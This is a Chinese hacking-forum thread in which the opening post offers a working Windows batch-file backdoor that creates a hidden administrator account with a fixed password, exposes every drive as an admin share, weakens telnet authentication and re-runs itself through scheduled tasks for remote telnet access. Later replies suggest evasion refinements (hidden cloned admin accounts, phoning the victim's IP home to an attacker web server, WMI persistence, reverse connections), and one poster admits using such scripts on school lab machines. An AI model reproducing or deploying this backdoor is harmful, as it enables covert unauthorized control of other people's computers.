中国DOS联盟论坛 - Powered by Discuz! Board

标题: 用批处理写的后门永不被杀 [打印本页]

作者: bagpipe 时间: 2006-2-11 10:47 标题: 用批处理写的后门永不被杀

不知道DOS联盟最近为什么这么冷清，希望各位兄弟踊跃发帖！

@echo off
@attrib +s + r hoby.bat
@net user hoby 12345 /add
@net localgroup administrators hoby /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\hoby.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\hoby.bat
@at 11:05 c:\WINNT\SYSTEM32\hoby.bat
@at 23:05 c:\WINNT\SYSTEM32\hoby.bat
@net stop telnet
@net start telnet
@exit

这样就会循环运行我们的程序了，即使被人停下来，过几个小时，又回重新运行，呵呵~~
运行后TELNET IP上去，用户名为hoby，密码为12345

作者: lords 时间: 2006-2-17 13:34
的确。这种东西不会被当作病毒，木马后门杀。但杀毒软件会提示这是一个危险脚本，照样杀。
这个和VBS,au3的区别多大？

作者: bagpipe 时间: 2006-2-17 14:21
对,说的确实没有错,现在网上没有绝对的免杀,只有怎么去绕过或者避免杀毒软件的手法,就跟RADMIN一样,去年好像杀毒软件还不能查杀(除了木马专杀外)现在可能就不成了,所以说知识的更新很快,没有万能的方法,不过我很久就有这样的一个想法,请看下面,多多提意见,我没有试验过.对局域网内部机器不起作用

方法如下: 我说的方法就是TELNET连接(防火墙情况除外,但是也可以躲过防火墙),杀毒软件一般杀不了,不过方法很笨,也很麻烦只是想法而已,我们用批处理克隆一个ADMINISTRATOR账号,提升为管理员,然后克隆一个TELNET服务,让系统自带的TELNET停止,克隆出来的TELNET服务运行(这样情况是可以用TELNET连接的),然后利用脚本的收发邮件的功能给我们指定的邮箱发送这台计算机的外网IP地址,然后我们在去连接,注意我们本地也要建立一个同样的账号和密码的管理员用户,然后我们用这个身份启动运行TELNET程序来连接对方的机器.这个只是我的想法而已,请大家看看,如果有什么不妥请提出您的宝贵意见!!!

作者: 3742668 时间: 2006-2-18 20:07
其实用telnet也不是很安全，毕竟别人只要netstat -abnov(XP)就可以看得清清楚楚了
不过CMD的命令的网络功能的确不是很强大，建议用BAT+VBS的方法。
先修改注册表克隆一个administrator帐号(可以克隆一个用net user以及其他工具查看不出来的隐藏管理员帐号，具体方法这里略过)，然后修改组策略提升网络登陆的权限，然后利用VBS脚本在后台开一个IE登陆到你自己的web上去(这个web不要让别人知道，这样你就可以从日志里面得到IP），最后就是隐藏自己，最好是能在CIM里面找个地方，也可以在注册表里面找个隐蔽的地方，一定不要放在run键下。
完了之后你在你那边直接从WMIC上登陆来控制，这样防火墙应该是不会杀的，毕竟是windows自带的功能。

作者: #four# 时间: 2006-3-1 13:30
@echo off
@attrib +s + r hoby.bat
@net user hoby 12345 /add
@net localgroup administrators hoby /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\hoby.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\hoby.bat
@at 11:05 c:\WINNT\SYSTEM32\hoby.bat
@at 23:05 c:\WINNT\SYSTEM32\hoby.bat
@net stop telnet
@net start telnet
@exit

请问@net stop schedule
@net start Schedule是什么意思？？？

作者: electronixtar 时间: 2006-3-1 14:10
支持BagPipe!!!!!

回楼上：启计划任务服务以运行下面的 at 命令，有SYSTEM权限的哦～～◎符号的作用是不显示本条命令

[ Last edited by electronixtar on 2006-3-1 at 14:13 ]

作者: htysm 时间: 2006-6-26 20:40
这个确实不错,有点意思.

作者: buddiyar 时间: 2006-7-9 18:22
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\hoby.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\hoby.bat

这里的>和>>怎么解释呢?
>在这里相当与重命名了么
还请各位指点啊

作者: guoqihua 时间: 2007-5-16 14:39
用批处理写的后门永不被杀

作者: ttyp 时间: 2007-5-16 16:34
还用不被杀？弱点太多了，骗骗菜鸟我看行，
添加用户，至少你克隆用户啊
schedule 服务，稍微安全点的机器都禁用的
telnet 同上
用telnet防火墙会拦截，至少要反弹的吧

脚本用WMI的事件定时器做后门不错

作者: joinhoone 时间: 2007-5-17 10:47
想法多多啊。。就是发言的人太少了

作者: mycs163 时间: 2007-5-27 19:36
不错

作者: love4u 时间: 2007-6-3 23:29
我每天都会看windows跟system32下面的文件的,大概有些神经质

net start Schedule这个服务我一定是禁用的

不过见过一些公司,Schedule是打开的,因为要定时用ntbackup东东

个人认为这个方法不够完美

作者: lvbsl 时间: 2007-6-7 15:16
Schedule 这个服务一般是禁止的
这样建立后门理论上是可行的
但用起来就不那么顺手了

作者: 408857961 时间: 2007-6-7 21:35
多谢帮助!!!!!!!!!!!!!!

作者: fly281426625 时间: 2007-6-13 21:55
小菜鸟顶你

作者: alex0007 时间: 2007-6-14 04:26
这个思路去骗一下小菜还行..但想骗小菜..方法实在太多..不过从思路和学习的目的..此贴还是有它的价值..

作者: xiao778855 时间: 2007-6-17 13:52 标题: 顶你了

恩,虽然批处理写的有些简单,但很实用,不过脚本杀毒软件是报警的,现在免杀越来越难了

作者: hackerflysky 时间: 2007-6-18 00:51 标题: 顶

主要的是思路

作者: debug 时间: 2007-12-2 16:27
bu cuo

作者: cay6200 时间: 2007-12-2 16:38
@attrib +s + r hoby.bat
@tlntadmn config sec = -ntlm
这是什么意思呀

作者: Sing 时间: 2007-12-3 22:26
这个想法的确不错，但是我比较同意10楼的意见。
我在学校机房里用过类似这样的脚本进行过攻击，可以说效果还是比较明显的。
但毕竟机房的机器不是自己的，所以一般来说，没有人会在意自己的机器怎么样了。
像是自己家的东西就不一样了吧，至少都会安装一个防火墙啊，不装防火墙，系统也会有自带的吧，那玩意虽说不怎么管用，但是telnet保证上不去。

作者: maclover815 时间: 2007-12-7 23:36 标题: 向高手学习

努力中。

作者: bondfly 时间: 2007-12-8 19:04
多谢帮助

作者: yhdnxg 时间: 2007-12-8 23:51
支持下

作者: bob1989 时间: 2007-12-10 16:27
用计划任务的确是个好方法

作者: xujian600 时间: 2008-4-28 15:35
看的我头晕,我要好好学习DOS.

作者: firstallbao 时间: 2008-4-28 16:28
好好学习

作者: wtp791211 时间: 2008-4-29 17:43
不错，顶一下

作者: smily 时间: 2008-5-1 16:12
呃！
这样也行！
牛！

还真是要好好滴看看DOS啦！

作者: raysea007 时间: 2008-5-2 14:41
都是一些人才,呵呵我都看不懂,呵呵

作者: youhun 时间: 2008-5-4 09:20
我想知道此东西第一次运行靠什么呢

作者: clong 时间: 2008-5-4 09:45
看了，也懂，但不知道怎么说~

回楼上，大约按你的意思，答案应该是CMD。

作者: fengxuefeng1989 时间: 2008-5-5 13:34
说的确实不错！！！！

作者: lfopt 时间: 2008-5-5 22:33
@tlntadmn config sec = -ntlm
这句是什么，看不明白

作者: XiuXiu 时间: 2008-5-5 22:59
觉得先用SC命令之后再用net start 来开telnet和Schedule服务可能会好一点.成功的机会比较大哦

作者: david1972 时间: 2008-5-21 11:06
反正菜鸟的机器好进

作者: hisplay 时间: 2008-8-17 11:47
不是吧。。。那么麻烦。。干脆过去把他的机强制抱回家，想怎么看就怎么看。想要什么都可以拷贝。速度，方便。又能避开所有的杀软和防火。觉得如何